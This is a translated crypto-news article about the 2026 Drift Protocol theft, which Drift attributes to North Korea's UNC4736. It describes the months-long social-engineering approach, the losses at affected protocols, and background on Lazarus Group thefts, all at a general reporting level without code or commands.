You may encounter high-net-worth clients who are possibly "mercenaries" for North Korean hackers

Original Author: Nicky, Foresight News

Recently, Drift Protocol released the latest investigation results regarding the attack incident, indicating that this operation was carried out by the same threat actor involved in the October 2024 Radiant Capital hacking incident, with a high degree of similarity in on-chain fund flows and operational methods. Security firm Mandiant attributed the Radiant Capital attack to UNC4736, an organization linked to the North Korean government.

After the Drift attack, the hackers have accumulated 130,293 ETH, worth approximately $266 million. The incident affected 20 protocols, including Prime Numbers Fi, Gauntlet, Elemental DeFi, Project 0, among others. Prime Numbers Fi estimated losses exceeding $10 million, Gauntlet around $6.4 million, Neutral Trade around $3.67 million, and Elemental DeFi around $2.9 million, with Elemental expressing hopes of receiving partial compensation from Drift.

Drift stated that the attack was a meticulously planned operation lasting six months. In the fall of 2025, a group claiming to be a quantitative trading company approached Drift contributors at a major crypto conference. Based on the timeline, the major crypto conferences during this period included Korea Blockchain Week 2025 (September 22 to 28, 2025, held in Seoul), TOKEN2049 Singapore (October 1 to 2, 2025, held in Singapore), Binance Blockchain Week Dubai 2025 (October 30 to 31, 2025, held in Dubai), and Solana Breakpoint Dubai (November 20 to 21, 2025, held in Dubai).

Drift officials claimed that they were technically skilled, had verifiable professional backgrounds, and were very familiar with Drift's operations. Both parties established a Telegram group and engaged in substantive discussions about trading strategies and treasury integration over the following months.

From December 2025 to January 2026, this group officially settled into an ecological treasury on Drift, filling out strategy detail forms as required. They held multiple working discussions with several contributors, raised detailed product issues, and deposited over $1 million of their own funds. Through patient and orderly operations, they established a fully functional business presence within the Drift ecosystem.

Integration discussions continued until March of this year. Several Drift contributors met face-to-face with these individuals again at various international conferences. By this time, both parties had established a nearly six-month cooperative relationship, and the other party was no longer a stranger but a partner they had worked with. During this period, they shared links to projects, tools, and applications they claimed to be building, which is a common practice among trading firms.

After the attack on April 2, investigators conducted a comprehensive forensic examination of known affected devices, accounts, and communication records, with interactions with this trading team becoming the most likely intrusion path. At the time of the attack, the other party's Telegram chat records and malware had been completely wiped.

The investigation revealed that the attackers may have infiltrated Drift contributors' devices through three methods. One contributor may have been compromised after cloning the code repository shared by the team, which was disguised as the front end for deploying their treasury. Another contributor was lured into downloading a TestFlight app, which the other party claimed was their wallet product. Regarding the infiltration path of the code repository, the security community had repeatedly warned from December 2025 to February 2026 about known vulnerabilities in VSCode and Cursor, where simply opening a file, folder, or repository in the editor could silently execute arbitrary code without user clicks or any prompts. A complete forensic analysis of the affected hardware is still ongoing.

This operation is linked to the same threat actor involved in the October 2024 Radiant Capital hacking incident. Mandiant attributed the Radiant attack to UNC4736, a state-sponsored organization from North Korea, also known as AppleJeus or Citrine Sleet. The attribution is based on two aspects: on-chain fund flows indicate that the funds used to plan and test this operation can be traced back to the Radiant attackers; operationally, the disguises used in this action show identifiable overlaps with known North Korean-related activities.

Drift pointed out that the individuals who appeared at the offline meetings were not of North Korean nationality. Such high-level North Korean threat actors typically establish face-to-face relationships through third-party intermediaries.

UNC4736 is a cluster of threat actors tracked by Mandiant, with high confidence assessments linking it to the North Korean Reconnaissance General Bureau. This organization has continuously targeted the cryptocurrency and fintech industries since 2018, stealing digital assets through supply chain attacks, social engineering, and malware delivery.

Known major attack incidents include the March 2023 3CX supply chain attack, the $50 million theft from Radiant Capital in 2024, and the $285 million theft from Drift, with statistical data indicating that the organization has stolen approximately $335 million in total.

This cluster is widely regarded as a subset of the Lazarus Group, focusing on financially motivated cybercrime. The Lazarus Group stole approximately $1.5 billion in assets from Bybit in February 2025, marking the largest single theft in cryptocurrency history.

Lazarus Group is a cluster of cyber threat actors supported by the North Korean government, belonging to the Reconnaissance General Bureau, which includes multiple sub-clusters such as UNC4736 (i.e., AppleJeus/Citrine Sleet) and TraderTraitor. According to Chainalysis, North Korean hackers have stolen approximately $6.75 billion in cryptocurrency through clusters like Lazarus, with over $2 billion in 2025 alone.

The organization has been responsible for several globally sensational attack incidents: the 2014 Sony Pictures Entertainment hack, the $81 million theft from the Bangladesh central bank in 2016, the global WannaCry ransomware outbreak in 2017, the $620 million and $100 million thefts from Ronin Bridge and Harmony Horizon Bridge in 2022, and attacks on Atomic Wallet and Stake in 2023. In October 2024, UNC4736 attacked Radiant Capital, stealing $50 million; in February 2025, TraderTraitor stole a record $1.5 billion from Bybit; and in April 2026, they completed a $285 million attack on Drift Protocol.

Lazarus has cumulatively driven North Korea's cryptocurrency theft amount to $6.75 billion. Attack methods have shifted from early destruction to long-term infiltration, social engineering, supply chain attacks, and malicious smart contract/multi-signature infiltration.

Drift's statement noted that the investigation revealed that the identities used in third-party directed actions had complete personal and professional histories, including work experience, public qualifications, and professional networks. The individuals seen by Drift contributors offline spent months building identity profiles that could withstand scrutiny in a business cooperation context.

Security researcher Taylor Monahan previously stated that North Korean IT workers have been infiltrating cryptocurrency companies and DeFi projects for at least seven years, with over 40 DeFi platforms having North Korean IT workers involved at various stages. The Drift incident further indicates that the attackers have evolved from remote job infiltration to face-to-face, months-long targeted intelligence operations.

Drift stated that it will continue to cooperate with law enforcement, forensic partners, and ecosystem teams, with more details to be released after the investigation is completed. All remaining protocol functions have been frozen, the stolen wallets have been removed from multi-signatures, and the attackers' addresses have been flagged at various exchanges and cross-chain bridge operators.